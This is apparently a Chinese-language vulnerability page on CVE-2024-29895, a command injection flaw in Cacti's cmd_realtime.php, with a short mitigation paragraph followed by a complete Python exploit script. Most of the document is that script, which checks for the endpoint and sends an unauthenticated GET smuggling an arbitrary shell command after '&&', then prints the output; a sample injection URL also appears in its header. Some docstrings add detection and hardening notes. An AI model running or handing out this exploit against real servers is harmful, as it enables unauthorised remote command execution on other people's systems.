CVE-2024-29895 | Cacti服务器命令执行

影响描述

CVE-2024-29895 为命令注入漏洞:当 Cacti 服务器的 PHP 组件启用 register_argc_argv 选项时,攻击者无须通过身份验证即可在服务器上执行任意命令,CVSS 风险评分为 10 分。由于触发条件依赖该选项,在部署官方修复之前,可先在 php.ini 中将 register_argc_argv 设为 Off,并限制外部对 cmd_realtime.php 的访问。

poc&exp


# CVE-2024-29895 - RCE in Cacti
# A command injection vulnerability allows any unauthenticated user to execute arbitrary commands on the server when PHP's register_argc_argv option is On.
# http://target/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

# Cacti (PHP)
# Affected versions:
# 1.3.x DEV

# Usage: python3 cve-2024-29895.py http://target.com:8080/ "id"
# Developed by @stuub

import requests
import argparse
import urllib3
from urllib.parse import urlparse
# Silence urllib3's InsecureRequestWarning: the requests in this script are
# sent with verify=False, so TLS certificates are never validated and the
# identity of the answering server is not authenticated.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

# ANSI SGR escape sequences used to colour the status lines printed to the
# terminal; `reset` (code 0) restores the default rendition.
red, green, yellow, purple, reset = (
    f"\033[{sgr}m" for sgr in (91, 92, 93, 95, 0)
)

def banner():
    """Print the script's ASCII-art title card to stdout.

    Purely cosmetic: the text is built from the module-level ``yellow``,
    ``purple`` and ``reset`` colour codes and nothing else is done here.
    """
    title_card = f"""


 ▄████▄   ▄▄▄       ▄████▄  ▄▄▄█████▓ ██▓    ██▀███   ▄████▄  ▓█████ 
▒██▀ ▀█  ▒████▄    ▒██▀ ▀█  ▓  ██▒ ▓▒▓██▒   ▓██ ▒ ██▒▒██▀ ▀█  ▓█   ▀ 
▒▓█    ▄ ▒██  ▀█▄  ▒▓█    ▄ ▒ ▓██░ ▒░▒██▒   ▓██ ░▄█ ▒▒▓█    ▄ ▒███   
▒▓▓▄ ▄██▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░   ▒██▀▀█▄  ▒▓▓▄ ▄██▒▒▓█  ▄ 
▒ ▓███▀ ░ ▓█   ▓██▒▒ ▓███▀ ░  ▒██▒ ░ ░██░   ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
░ ░▒ ▒  ░ ▒▒   ▓▒█░░ ░▒ ▒  ░  ▒ ░░   ░▓     ░ ▒▓ ░▒▓░░ ░▒ ▒  ░░░ ▒░ ░
  ░  ▒     ▒   ▒▒ ░  ░  ▒       ░     ▒ ░     ░▒ ░ ▒░  ░  ▒    ░ ░  ░
░          ░   ▒   ░          ░       ▒ ░     ░░   ░ ░           ░   
░ ░            ░  ░░ ░                ░        ░     ░ ░         ░  ░
░                  ░                                 ░               

                    {yellow}CVE-2024-29895 - RCE in Cacti 1.3.x DEV{reset}
                              {purple}Developed by @stuub{reset}
          """
    print(title_card)

def validate(url):
    """Report whether ``/cacti/cmd_realtime.php`` answers HTTP 200 under *url*.

    The path is appended to *url* exactly as given and a single
    unauthenticated GET is sent with TLS certificate verification disabled
    (``verify=False``).  A coloured status line is printed either way.

    A 200 only shows that the script is reachable over HTTP; this check does
    not establish that the host is vulnerable.  For a defender, the same
    observation is a hardening finding in its own right.
    NOTE(review): cmd_realtime.php appears to be meant for command-line use
    only -- confirm against the Cacti documentation before relying on that.

    Returns:
        True when the response status code is 200, otherwise False.
    """
    probe_url = url + "/cacti/cmd_realtime.php"
    found = requests.get(probe_url, verify=False).status_code == 200

    if found:
        print(f"{green}[*]{reset} Found Cacti installation")
    else:
        print(f"{red}[!]{reset} Cacti not found")
    return found

def RCE(url, command):
    """Send the CVE-2024-29895 request carrying *command* and print the reply.

    *url* is reduced to ``scheme://netloc`` (any path, query or fragment is
    dropped), the fixed ``/cacti/cmd_realtime.php`` query string is built
    around *command* by plain concatenation, and one unauthenticated GET is
    sent with TLS certificate verification disabled.  The response body is
    printed with ``<br>`` replaced by newlines.

    Defender notes: the request built here is a GET for ``cmd_realtime.php``
    whose query string contains ``&&``, which makes it a candidate pattern
    for access-log review and WAF rules.  The file header ties the flaw to
    PHP's ``register_argc_argv`` being On, so turning that option Off removes
    the stated precondition.
    """
    target = urlparse(url)
    origin = f"{target.scheme}://{target.netloc}"
    payload = "".join(
        (origin, "/cacti/cmd_realtime.php?1+1&&", command, "+1+1+1")
    )

    print (f"{green}[*]{reset} Targeting URL: {yellow}{payload}{reset}")
    reply = requests.get(payload, verify=False)
    print(f"\n{green}[*]{reset} Response:")
    # The endpoint separates output lines with <br>; show them as text lines.
    print(reply.text.replace("<br>", "\n"))

def main():
    """Parse ``-u/--url`` and ``-c/--command`` and run the check, then the request.

    When either option is missing, a usage line is printed and the process
    exits.  Otherwise ``validate`` is called first and ``RCE`` runs only if
    it returned True.

    NOTE(review): the printed usage line shows the URL as a positional
    argument, which does not match the ``-u`` flag the parser defines.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-29895 - RCE in Cacti")
    cli.add_argument('-u', '--url', help="URL of the target")
    cli.add_argument('-c', '--command', help="Command to execute")
    opts = cli.parse_args()

    # Both options are required in practice; argparse leaves them as None
    # when they are not supplied.
    if opts.url is None or opts.command is None:
        print(f"{green}Usage:{reset} python3 cve-2024-29895.py http://target.com:8080/ -c 'id'")
        exit()

    if not validate(opts.url):
        return
    RCE(opts.url, opts.command)

# Run only when executed as a script (not on import): print the banner,
# then parse the command line and act on it.
if __name__ == "__main__":
    banner()
    main()